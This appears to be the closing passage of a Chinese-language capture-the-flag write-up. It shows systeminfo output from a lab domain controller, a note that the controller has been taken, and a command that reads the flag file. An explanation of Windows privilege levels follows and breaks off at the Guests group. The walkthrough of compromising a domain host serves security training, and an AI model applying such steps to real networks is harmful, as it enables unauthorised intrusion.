Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC+08:00) Beijing, Chongqing, Hong Kong, Urumqi Total Physical Memory: 2,047 MB Available Physical Memory: 1,245 MB Virtual Memory: Max Size: 2,431 MB Virtual Memory: Available: 1,640 MB Virtual Memory: In Use: 791 MB Page File Location(s): C:\pagefile.sys Domain: test.org Logon Server: N/A Hotfix(s): 120 Hotfix(s) Installed. [01]: KB2894856 [02]: KB2919355 [03]: KB2919442 [04]: KB2938066 [05]: KB2938772 [06]: KB2949621 [07]: KB2954879 [08]: KB2967917 [09]: KB2977765 [10]: KB2978041 [11]: KB2978126 [12]: KB2989930 [13]: KB2999226 [14]: KB3000850 [15]: KB3003057 [16]: KB3012702 [17]: KB3013172 [18]: KB3013791 [19]: KB3014442 [20]: KB3019978 [21]: KB3023222 [22]: KB3023266 [23]: KB3024751 [24]: KB3024755 [25]: KB3030947 [26]: KB3032663 [27]: KB3033446 [28]: KB3034348 [29]: KB3035126 [30]: KB3036612 [31]: KB3037579 [32]: KB3038002 [33]: KB3042058 [34]: KB3042085 [35]: KB3043812 [36]: KB3044374 [37]: KB3044673 [38]: KB3045634 [39]: KB3045685 [40]: KB3045717 [41]: KB3045719 [42]: KB3045755 [43]: KB3045999 [44]: KB3046017 [45]: KB3046737 [46]: KB3054169 [47]: KB3054203 [48]: KB3054256 [49]: KB3054464 [50]: KB3055323 [51]: KB3055343 [52]: KB3055642 [53]: KB3059317 [54]: KB3060681 [55]: KB3060793 [56]: KB3061512 [57]: KB3063843 [58]: KB3071663 [59]: KB3071756 [60]: KB3074228 [61]: KB3074548 [62]: KB3077715 [63]: KB3078405 [64]: KB3078676 [65]: KB3080149 [66]: KB3082089 [67]: KB3084135 [68]: KB3086255 [69]: KB3087137 [70]: KB3091297 [71]: KB3094486 [72]: KB3095701 [73]: KB3097997 [74]: KB3098779 [75]: KB3099834 [76]: KB3100473 [77]: KB3103616 [78]: KB3103696 [79]: KB3103709 [80]: KB3109103 [81]: KB3109976 [82]: KB3110329 [83]: KB3115224 [84]: KB3121261 [85]: KB3123245 [86]: KB3126434 [87]: KB3126587 [88]: KB3133043 [89]: KB3133690 [90]: KB3134179 [91]: KB3134815 [92]: KB3137728 [93]: KB3138602 [94]: KB3139162 [95]: KB3139164 [96]: KB3139398 [97]: KB3139914 [98]: KB3140219 [99]: KB3140234 [100]: KB3145384 [102]: KB3146604 [103]: KB3146723 [104]: KB3146751 [105]: KB3147071 [106]: KB3149157 [107]: KB3155784 [108]: KB3156059 [109]: KB3159398 [110]: KB3161949 [111]: KB3162343 [112]: KB3172729 [113]: KB3173424 [114]: KB3175024 [115]: KB3178539 [116]: KB3179574 [117]: KB3185319 [118]: KB4033428 [119]: KB4521864 [120]: KB4520005 Network Card(s): 1 NIC(s) Installed. [01]: Intel(R) 82574L Gigabit Network Connection Connection Name: Ethernet0 DHCP Enabled: No IP address(es) [01]: 192.168.93.10 [02]: fe80::e452:c45d:7bd5:feb6 Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed. C:\Windows\system32>
已经拿下域控了
1 type C:\Users\Administrator\Documents\flag.txt
最后给flag加上flag{}
成功通关
最后补充,WIN权限分类
1 2 3 4 5 6 7 8 9 10 11 12 13 1. **TrustedInstaller(信任安装器)** 本机理论最高权限,是 Windows 系统核心文件、核心注册表项的默认所有者,作用是保护系统核心组件不被篡改,哪怕是 System 账户也无权修改它管辖的文件,只有系统更新、补丁安装时才会调用这个身份。 2. **NT AUTHORITY\SYSTEM(本地系统账户)** 本机实际可操作的最高权限,就是你刚才拿到的 `nt authority\system`。 - 特点:无需密码,是 Windows 内置的服务账户,拥有所有系统特权(调试进程、访问内核、修改所有本地文件) - 比普通管理员高的地方:不受 UAC 限制,拥有更多底层特权,能访问管理员碰不了的系统深层目录 3. **Administrators 组(本地管理员组)** 日常所说的「管理员权限」,内置的 `Administrator` 账户就是这个组的默认成员。 - 权限:可以安装软件、修改系统设置、管理其他用户;但修改系统核心文件时会受权限限制,需要手动提权获取所有权 - 注意:自己新建的管理员用户,也属于这个组,权限和内置 Administrator 一致 4. **Users 组(标准用户组)** 普通用户权限,日常办公的默认等级。只能操作自己的用户目录(桌面、文档等),不能安装软件、不能修改系统配置,访问其他系统目录会被拒绝。 5. **Guests 组(来宾组)**